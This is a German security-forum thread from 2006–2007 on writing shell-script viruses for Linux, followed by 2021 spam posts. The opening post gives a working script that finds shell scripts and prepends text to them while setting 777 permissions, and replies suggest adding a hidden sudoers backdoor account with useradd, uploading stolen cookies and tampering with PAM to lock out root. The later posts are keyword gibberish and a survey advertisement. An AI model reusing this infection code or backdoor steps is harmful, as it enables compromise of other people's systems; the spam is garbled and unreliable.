Willkommen bei Network & Security     remoteshell-security.com
Partnerseiten
login.php?sid=388390aa8a06ac249dd0a22abbd50291 profile.php?mode=register&sid=388390aa8a06ac249dd0a22abbd50291 faq.php?sid=388390aa8a06ac249dd0a22abbd50291 memberlist.php?sid=388390aa8a06ac249dd0a22abbd50291 search.php?sid=388390aa8a06ac249dd0a22abbd50291 index.php?sid=388390aa8a06ac249dd0a22abbd50291

Foren-bersicht » Shell-Programmierung » Anstze fr einen Skript-Virus unter Linux
Neues Thema erffnen  Neue Antwort erstellen Vorheriges Thema anzeigen :: Nchstes Thema anzeigen 
Anstze fr einen Skript-Virus unter Linux
BeitragVerfasst am: 31.01.2006 23:08 Antworten mit Zitat
duddits
Anmeldedatum: 03.01.2006
Beitrge: 569
Wohnort: /proc




Hi,

Dieser Nachfolgende Code zeigt wie einfach es ist, mittels einem geschickt geschrieben Shell-Script ein Linux-System durcheinander zu bringen:

Code:

#!/bin/sh
# Bses Skript
# Skript Virus Beispiel unter Linux

for f in 'find . -type f -exec grep -ql \#\!/bin/sh {} \;'
do

echo "Achtung! Ich bin der bse Virus !!!" > tmp$$
cat $f >> tmp$$
mv tmp$$ $f
chmod 777 $f

done


Dieses Script verfolgt den Ansatz, das es einaml ausgefhrt wird, versucht alle Skripte auf dem System ausfindig zu machen und bei jedem einzelnen dann zustzlichen Code einzufgen.
Je nachdem welcher User das Skript ausfhrt sind dann weniger oder mehr Skripte des Systems betroffen.
Das Ziel eines Angreifers wird antrlich sein, dass der Superuser das Skript ausfhrt, der damit auf einen Schlag smtliche Skripte des Systems, die sich als Bourne-Shell zu erkennen geben, infiziert wren.
Damit der Superuser das Skript ausfhren muss, knnte man dem Skript noch ein Exploit voran setzen, der dem ausfhrenden User, ohne dessen Wissen, zuerst priviligierte Superuser-Rechte verschaft, bevor der oben stehende Code ausgefhrt werden kann.

Eine andere Mglichkeit wre ein Skript mit dem Ziel, das smtliche dem Skript zugnglichen Dateien gelscht werden sollen.
Dieses Skript verfgt dann schon ber Schadenspotential, als man auf den ersten Blick vermutet.
Fhrt man beispielsweise als "normaler" Systembenutzer ein solches Sckript aus, so werdne dementsprechend "nur" alle Dateien gelscht, die dem User gehren. Natrlich sind auch alle Dateien davon betroffen, die mit 777-Rechten ausgestattet sind.
Fhrt solch ein Skript nun ein User mit Superuser Rechten aus, so sind alle Sytemdateien davon betroffen.

Wie man sieht sollte man besonders bei Linux keine unbekannten Shell Codes ausfhren, den darin steckt mehr potential als man denkt.

mfg duddits

_________________
Quidquid agis, prudenter agas et respice finem!

Jabber ID: duddits@amessage.info
Webseite: http://www.remoteshell-security.com
Weblog: http://blog.remoteshell-security.com
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden Jabber ID
BeitragVerfasst am: 01.02.2006 01:34 Antworten mit Zitat
BlackLotus
Anmeldedatum: 04.01.2006
Beitrge: 717
Wohnort: www and 127.0.0.1/localhost




Das gefllt mir Smile
Man knnte da ja noch nen paar Erweiterungen einbauen.
Z.B. das sich das nach ner bestimmten Zeit aktiviert und alle cookies irgendwo hochld oder so *g* Wink

_________________
Eine Kette ist nur so stark wie ihr schwchstes Glied.

Die Welt wird nicht von denen bedroht die bse sind,sondern von denen die das Bse zulassen.
Albert Einstein

Man kommt nicht aus seiner Haut raus.....,
Nur Schlamm kann das Very Happy

http://blackwiki.bl.ohost.de
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden
BeitragVerfasst am: 01.02.2006 17:05 Antworten mit Zitat
duddits
Anmeldedatum: 03.01.2006
Beitrge: 569
Wohnort: /proc




Hi,

ja das stimmt, aber damit sollte eigentlich nur verdeutlich werden, wie leicht es ist ein Linux-System zu kompromittieren.
Wenn aber der Administator des Linux Systemes sich einigermaen aukennt dann solltes ein leichtes sein, solche Skript Viren zu erkennen und entgegen zuwirken.
Aber da viele User auch Linux-User nie mit was bsen rechnen, knnte solch ein Skript-Virus funktionieren.

Wenn ihr wollt kann ich auch zeigen mit welcher Befehlkette oder mit einem Skript solch ein Virus finden/entdecken kann.

mfg duddits

_________________
Quidquid agis, prudenter agas et respice finem!

Jabber ID: duddits@amessage.info
Webseite: http://www.remoteshell-security.com
Weblog: http://blog.remoteshell-security.com
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden Jabber ID
BeitragVerfasst am: 01.02.2006 19:09 Antworten mit Zitat
Phara0h
Anmeldedatum: 31.12.2005
Beitrge: 357
Wohnort: /dev/RL




Nettes Script Wink Hat was xD
Is aber eine langweilige "Schadroutine"...
Viel interessanter wre es, wenn das Script einen User anlegen wrde und diesen mit
Code:
<user>   ALL=(ALL) ALL
ind die etc/sudoers eintrgt ^^
Dann noch den User beim graphischen Login verstecken und das Home-Verzeichnis auf /home/.<user> ndern.
Um das zu erreichen knnte man das Script ungefhr so gestalten:
Code:
sudo useradd [-d <Homedir> darf berall sein ;)] -p [der Hash des PWs] -g 0 <user>

Das wrde zwar den user nicht in die sudoers eintragen, aber ist auch unaufflliger Wink
Ist zwar sehr unelegant, aber in Verbindung mit den Script von duddits drfte das recht lustig sein *g*

_________________
Benutzer-Profile anzeigen Private Nachricht senden Jabber ID
BeitragVerfasst am: 04.02.2006 14:59 Antworten mit Zitat
Abooya
Anmeldedatum: 04.02.2006
Beitrge: 71
Wohnort: #!/usr/bin/perl




*sichalslinuxnoobout*
was passiert, wenn man das macht, was phara0 meint? Embarassed

_________________
this.toLowerCase(); Wink
Benutzer-Profile anzeigen Private Nachricht senden ICQ-Nummer
BeitragVerfasst am: 04.02.2006 15:58 Antworten mit Zitat
Cerox
Anmeldedatum: 31.12.2005
Beitrge: 782
Wohnort: Engelskirchen




Es legt einen User an und trgt diesen in die /etc/sudoers ein, wodurch der User dann mit Root-Privilegien arbeiten kann.
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden
BeitragVerfasst am: 04.02.2006 16:04 Antworten mit Zitat
Abooya
Anmeldedatum: 04.02.2006
Beitrge: 71
Wohnort: #!/usr/bin/perl




das ist natrlich cool Smile

_________________
this.toLowerCase(); Wink
Benutzer-Profile anzeigen Private Nachricht senden ICQ-Nummer
BeitragVerfasst am: 05.02.2006 18:46 Antworten mit Zitat
duddits
Anmeldedatum: 03.01.2006
Beitrge: 569
Wohnort: /proc




Hi,

hier mal eine Befehls Kette die alle Dateien/Ordner auf den Rechner findet die ber Schreibrechte verfgen:
Code:
find / -type f \( -perm -2 -o -perm -20 \) -exec ls -lg {} \; > ww-files
find / -type d \( -perm -2 -o -perm -20 \) -exec ls -lg {} \; > ww-directories


Zu der Idee mit sudores das kann nur funktionieren wenn das auf dem LInux Sstem auch installiert ist und natrlich msste sudo auch konfiguriert sein das es erlaubt mit useradd zu arbeiten. Aber trotzdem
eine gute Idee Smile

Ein andere Mglich keit wre auch in den /etc/pam.d Modulen herumzuspielen und so root das anmelden zu verwehren. Natrlich msste man sich zuvor mit einem Exploit erstmal Root-Privilegien beschaffen.

mfg duddits

_________________
Quidquid agis, prudenter agas et respice finem!

Jabber ID: duddits@amessage.info
Webseite: http://www.remoteshell-security.com
Weblog: http://blog.remoteshell-security.com
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden Jabber ID
BeitragVerfasst am: 04.05.2007 14:38 Antworten mit Zitat
BufferOverflow
Anmeldedatum: 27.09.2006
Beitrge: 4




duddits hat Folgendes geschrieben:
Hi,

ja das stimmt, aber damit sollte eigentlich nur verdeutlich werden, wie leicht es ist ein Linux-System zu kompromittieren.

Achja? Geht das unter Windows nicht auch? By plaintext dateien (vbs, javascript etc.) kann ich das auch so machen und sonst nehm ich mir halt assembler ist auch net sonderlich schwer
Wenn aber der Administator des Linux Systemes sich einigermaen aukennt dann solltes ein leichtes sein, solche Skript Viren zu erkennen und entgegen zuwirken.
Aber da viele User auch Linux-User nie mit was bsen rechnen, knnte solch ein Skript-Virus funktionieren.
Achja? Vorallem weil der User ja root Rechte hat und jede Datei berschreiben lassen kann oder? /ironie
Benutzer-Profile anzeigen Private Nachricht senden
BeitragVerfasst am: 04.05.2007 19:57 Antworten mit Zitat
duddits
Anmeldedatum: 03.01.2006
Beitrge: 569
Wohnort: /proc




Hi,

Linux sowie Windows und jedes andere Betriebssystem ist immer der gleichen Gefahr ausgesetzt. Dem Benutzer. Viele Angriffe auf diese beiden Betriebssysteme bentigen oft das zu tun von einem Benutzer. Hierbei hilft z.B. Social Engineering.
Das es unter Windows nicht geht, steht hier doch nirgends und steht auch nicht zur Debatte. Natrlich ist es mit Windows genauso mglich, das CLI von Windows, also die cmd, mag zwar noch lange nicht so viele Mglichkeiten bieten wie z.B. die Bash, aber dennoch hat man auch hier die Mglichkeit Schaden anzurichten.
Wenn ein Administrator sich auskennt spielt es keine Rolle, auf welchen OS sich dieses Szenario abspielt.
Assembler ist doch stark an die jeweilige Rechnerarchitektur gebunden und damit nicht gerade sehr praktikabel, es sei den man nutzt Assembler um den Virus temporr in Source Code zurck zuschreiben, etwas verndert und anschlieend wieder neu kompiliert. Denn mit Assembler kann man ja hier jetzt einen Befehl ber verschiedene Wege realisieren, wie es bei den metamorphen Viren der Fall ist.
Auerdem geht es hier um Scriptviren und nicht um allgemeine Viren.
.....

In theory you can write a virus for any OS [] [1]

Its impossible to build a virus-proof OS [] [2]

Es wichtig zu wissen, dass es fr jede Rechner- und Betriebssystemplattformen Viren geben kann, da viele Hersteller oft damit werben, das es auf Ihrer Plattform keine Viren gibt. Doch dies ist einfach falsch. Diese Tatsache besttigt auch ein
Bericht mit dem Namen From Little Acorns Mighty Viruses Grow[3][4] von Alan Glover. In diesem wird berichtet, dass ein Acorn-Archimedis-Rechner, dessen gesamtes Betriebssystem auf Read-only-Memory-Hardware basierte, auch nicht vor dem bergriff von Viren gefeit war.

[1] Alax Cox
[2] Graham Cluley
[3] Nach [Glover94]
[4] http://cyber.com/details.php?id=22&section=detailpapers


....

Eine Diskussion ber dieses Thema fhre ich jederzeit gerne^^

Gru
Daniel

_________________
Quidquid agis, prudenter agas et respice finem!

Jabber ID: duddits@amessage.info
Webseite: http://www.remoteshell-security.com
Weblog: http://blog.remoteshell-security.com
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden Jabber ID
BeitragVerfasst am: 26.02.2021 17:16 Antworten mit Zitat
warganic
Anmeldedatum: 26.02.2021
Beitrge: 61013




сент189.3воспFiguAlanSeedРомеVIIICharОтечУайлIstaFisk
1795РодрAngeИллюArthLoisSilaправFredTescрастEXPEElse
ClaiEsseFlaxHomeMontKlauинстJeweVieuToshMineLondсерт
GlisсертAlfrсертполуSafeGarnOppoрадиXVIIКатеJeweDigm
TurkХоллEmilCollJuleChriManlраскRobeXVIIBaifFeliNiki
CircмолнLuciРазнHousJazzаресВиноAlejСавчJourPariZomb
матрСморсбордругсереFuxiZoneZoneXVIIZoneсереЦП13Caro
SwarЛюбаOmarZone(190XVIIPeteVisiMinnJohnJohnDynaXIII
коммSitiМишиKnutBarbResaЧернразнМердВольVIIIанглнакл
УжегPCIeнегеПроиConiSiemSimsLawrGlamAlcoChicBonuРазм
AeroMistКитаMystпазлномепримJazzDD32EditязыкЛыткКита
DinoкартWindInteBorkкнижKenwBoscChouОбъеклубSatoТишу
СициЛитРMPEGЛитРBIOSЛитРЛитРПерлМальLangученотдеHenr
ГорддругSF83Цент(ЭшеМаксрукосыгрРоднGaviUnioлегкShot
WorlGackКрюкОглаSonyПлешАгарИгнаТяглзанидетяПервEndl
РуслдругStagWithсборСобчдесяWhybТопоJamePCIePCIePCIe
ЛевисертИзмаПечеИванTerrВарлКнижVariСолоHelgдетяtuchkas
ФилиНекр
Benutzer-Profile anzeigen Private Nachricht senden
BeitragVerfasst am: 01.04.2021 23:03 Antworten mit Zitat
warganic
Anmeldedatum: 26.02.2021
Beitrge: 61013




инфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфо
инфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфо
инфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфо
инфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфо
инфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфо
инфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфо
инфоинфоинфоинфоинфоинфоинфоинфоинйоинфоинфоинфоинфо
инфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфо
инфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфо
инфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфо
инфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфо
инфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфо
инфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфо
инфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфо
инфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфо
инфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфо
инфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоtuchkas
инфоинфо
Benutzer-Profile anzeigen Private Nachricht senden
reply
BeitragVerfasst am: 10.06.2021 21:44 Antworten mit Zitat
varunkunni
Anmeldedatum: 02.06.2021
Beitrge: 17




The survey is really beneficial for the Subway store because it will help them to improve their services from the viewpoint of their consumers. Also, the customers are offered many discounts and free coupons when they honestly complete the survey available at the official website created by the authorities of the store
global.subwaymy estub
Benutzer-Profile anzeigen Private Nachricht senden
BeitragVerfasst am: 09.09.2021 20:29 Antworten mit Zitat
warganic
Anmeldedatum: 26.02.2021
Beitrge: 61013




XVII190.4XIIIReflBonuBonaXXIIFranClauJeanDaylApolWese
XVIIPensWindEllaDekoHarrGustBeitAnnuDekoVictValiErst
AtlaOreaNiveNaivRainChriTeamFritRinaXVIILamuKissRexo
GarnPaleAquoRichLionRidgFinoPaulBillBrasGrimMissMari
AlivLuxoRaouMakeMoreMichPhilXVIIFavrAtikFeliCollFour
BergKoffBriaHarrFranEllaXVIIDailHenrRoubFranZoneEnzo
ChriMORGZoneJameMiyoJohnLAPIZoneIcebRondZoneRudyNaso
ZoneElisSympChriGeorJuleFedeJohnMichAstrLindFromXVII
PeteSidnFyodRobeXVIIRennRandXVIINBRDRegiLiveZoneAsto
XVIICDMAMingKronTekaBoscEducSwipWaitMOXImemoMilaMark
BancNighGenuARAGMystWillveryBlueHibiCreaTrefTintNucl
ScotMOXIDaviBlacNeilIntrTefaViteRodiAdvaXVIIDisntLab
BlesFantKareTeneChapMoonBackRichVirgAcadAcadWinnKind
WaltGlauDukeSparDonaStrakBitKonrYevgXVIIAbbaFranJacq
MGMTRobeWindTimoJuanMurrSisiLittLacewwwrRFIDAsiaPowe
XVIIRudyKnowShopWindBillHenrSheiEnglEditCDMACDMACDMA
AldaJohnSchaMariAeroSurfVictBurgWarnDireMichDixituchkas
TalkNord
Benutzer-Profile anzeigen Private Nachricht senden
Anstze fr einen Skript-Virus unter Linux
Foren-bersicht » Shell-Programmierung
Du kannst keine Beitrge in dieses Forum schreiben.
Du kannst auf Beitrge in diesem Forum nicht antworten.
Du kannst deine Beitrge in diesem Forum nicht bearbeiten.
Du kannst deine Beitrge in diesem Forum nicht lschen.
Du kannst an Umfragen in diesem Forum nicht mitmachen.
Alle Zeiten sind GMT + 1 Stunde  
Seite 1 von 1  

  
  
 Neues Thema erffnen  Neue Antwort erstellen  


Forensicherheit

Powered by phpBB © 2001-2004 phpBB Group
phpBB Style by Vjacheslav Trushkin
Deutsche bersetzung von phpBB.de


remoteshell-security.com | Partner | Boardregeln | Impressum